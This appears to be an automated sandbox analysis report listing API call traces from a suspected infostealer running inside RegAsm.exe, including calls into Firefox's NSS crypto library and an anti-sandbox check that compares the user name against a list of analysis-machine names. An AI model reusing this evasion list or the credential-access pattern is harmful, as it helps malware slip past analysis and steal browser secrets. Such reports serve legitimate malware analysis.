                                                                                                        • NSSUTIL_ArgStrip.NSS3(?), ref: 6C1F6A5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
                                                                                                        • String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
                                                                                                        • API String ID: 2065226673-2785624044
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C1F6943
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C1F6957
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C1F6972
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C1F6983
                                                                                                          • Part of subcall function 6C1F6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C1F69AA
                                                                                                          • Part of subcall function 6C1F6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C1F69BE
                                                                                                          • Part of subcall function 6C1F6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C1F69D2
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C1F69DF
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C1F6A5B
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C1F6D8C
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6DC5
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6DD6
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6DE7
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C1F6E1F
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6E4B
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6E72
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6EA7
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6EC4
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6ED5
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6EE3
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6EF4
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6F08
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6F35
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6F44
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6F5B
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6F65
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C1F781D,00000000,6C1EBE2C,?,6C1F6B1D,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C40
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C1F781D,?,6C1EBE2C,?), ref: 6C1F6C58
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C6F
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C1F6C84
                                                                                                          • Part of subcall function 6C1F6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C1F6C96
                                                                                                          • Part of subcall function 6C1F6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C1F6CAA
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6F90
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6FC5
                                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C1F6FF4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                        • String ID: +` l
                                                                                                        • API String ID: 1304971872-3474994642
                                                                                                        APIs
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00401A13
                                                                                                        • lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NameUserlstrcmpi
                                                                                                        • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                        • API String ID: 542268695-1784693376
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_SignMessage), ref: 6C1EAF46
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1EAF74
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAF83
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAF99
                                                                                                        • PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C1EAFBE
                                                                                                        • PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C1EAFD9
                                                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C1EAFF4
                                                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C1EB00F
                                                                                                        • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C1EB028
                                                                                                        • PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C1EB041
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$n,l
                                                                                                        • API String ID: 1003633598-302734074
                                                                                                        APIs
                                                                                                        • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C1E094D
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1E0953
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C1E096E
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C1E0974
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C1E098F
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0995
                                                                                                          • Part of subcall function 6C1E1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1E1860
                                                                                                          • Part of subcall function 6C1E1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C1E09BF), ref: 6C1E1897
                                                                                                          • Part of subcall function 6C1E1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1E18AA
                                                                                                          • Part of subcall function 6C1E1800: memcpy.VCRUNTIME140(?,?,?), ref: 6C1E18C4
                                                                                                        • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0B4F
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0B5E
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0B6B
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C1E0B78
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                        • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                        • API String ID: 1637529542-763765719
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • _memset.LIBCMT ref: 004127B1
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?), ref: 004127C3
                                                                                                        • lstrcatA.KERNEL32(?,00436698), ref: 004127D5
                                                                                                        • lstrcatA.KERNEL32(?,e90840a846d017e7b095f7543cdf2d15), ref: 004127E7
                                                                                                        • lstrcatA.KERNEL32(?,0043669C), ref: 004127F9
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00412809
                                                                                                        • lstrcatA.KERNEL32(?,004366A0), ref: 0041281B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00412824
                                                                                                        • lstrcatA.KERNEL32(?,EMPTY), ref: 00412840
                                                                                                        • lstrcatA.KERNEL32(?,004366AC), ref: 00412852
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00412862
                                                                                                        • lstrcatA.KERNEL32(?,004366B0), ref: 00412874
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00412881
                                                                                                        • _memset.LIBCMT ref: 004128B7
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366B4,?), ref: 00412924
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                        • String ID: .exe$EMPTY$e90840a846d017e7b095f7543cdf2d15
                                                                                                        • API String ID: 141474312-4223934599
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C1F2DEC
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C1F2E00
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F2E2B
                                                                                                        • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F2E43
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C,?,-00000001,00000000,?), ref: 6C1F2E74
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C,?,-00000001,00000000), ref: 6C1F2E88
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1F2EC6
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1F2EE4
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1F2EF8
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F2F62
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F2F86
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C1F2F9E
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F2FCA
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F301A
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F302E
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F3066
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F3085
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F30EC
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F310C
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C1F3124
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F314C
                                                                                                          • Part of subcall function 6C1D9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C20379E,?,6C1D9568,00000000,?,6C20379E,?,00000001,?), ref: 6C1D918D
                                                                                                          • Part of subcall function 6C1D9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C20379E,?,6C1D9568,00000000,?,6C20379E,?,00000001,?), ref: 6C1D91A0
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F316D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 3383223490-0
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C1E8846
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E8874
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8883
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8899
                                                                                                        • PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C1E88BA
                                                                                                        • PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C1E88D3
                                                                                                        • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C1E88EC
                                                                                                        • PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C1E8907
                                                                                                        • PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C1E8979
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$n,l
                                                                                                        • API String ID: 1003633598-607707077
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_Digest), ref: 6C1E6D86
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E6DB4
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E6DC3
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E6DD9
                                                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C1E6DFA
                                                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C1E6E13
                                                                                                        • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C1E6E2C
                                                                                                        • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C1E6E47
                                                                                                        • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C1E6EB9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$n,l
                                                                                                        • API String ID: 1003633598-262512049
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F4C4C
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F4C60
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CA1
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CBE
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CD2
                                                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4D3A
                                                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4D4F
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4DB7
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F4DD7
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F4DEC
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F4E1B
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F4E2F
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4E5A
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F4E71
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F4E7A
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F4EA2
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F4EC1
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F4ED6
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F4F01
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F4F2A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 759471828-0
                                                                                                        APIs
                                                                                                        • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C246BF7), ref: 6C246EB6
                                                                                                          • Part of subcall function 6C1A1240: TlsGetValue.KERNEL32(00000040,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1267
                                                                                                          • Part of subcall function 6C1A1240: EnterCriticalSection.KERNEL32(?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A127C
                                                                                                          • Part of subcall function 6C1A1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1291
                                                                                                          • Part of subcall function 6C1A1240: PR_Unlock.NSS3(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A12A0
                                                                                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C2EFC0A,6C246BF7), ref: 6C246ECD
                                                                                                        • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C246EE0
                                                                                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C246EFC
                                                                                                        • PR_NewLock.NSS3 ref: 6C246F04
                                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C246F18
                                                                                                        • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C246BF7), ref: 6C246F30
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C246BF7), ref: 6C246F54
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C246BF7), ref: 6C246FE0
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C246BF7), ref: 6C246FFD
                                                                                                        Strings
                                                                                                        • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C246FF8
                                                                                                        • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C246FDB
                                                                                                        • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C246EF7
                                                                                                        • SSLKEYLOGFILE, xrefs: 6C246EB1
                                                                                                        • SSLFORCELOCKS, xrefs: 6C246F2B
                                                                                                        • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C246F4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                        • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                        • API String ID: 412497378-2352201381
                                                                                                        APIs
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000001C,?,6C21E853,?,FFFFFFFF,?,?,6C21B0CC,?,6C21B4A0,?,00000000), ref: 6C21E8D9
                                                                                                          • Part of subcall function 6C210D30: calloc.MOZGLUE ref: 6C210D50
                                                                                                          • Part of subcall function 6C210D30: TlsGetValue.KERNEL32 ref: 6C210D6D
                                                                                                          • Part of subcall function 6C21C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C21DAE2,?), ref: 6C21C6C2
                                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C21E972
                                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C21E9C2
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21EA00
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C21EA3F
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C21EA5A
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C21EA81
                                                                                                        • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C21EA9E
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C21EACF
                                                                                                        • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C21EB56
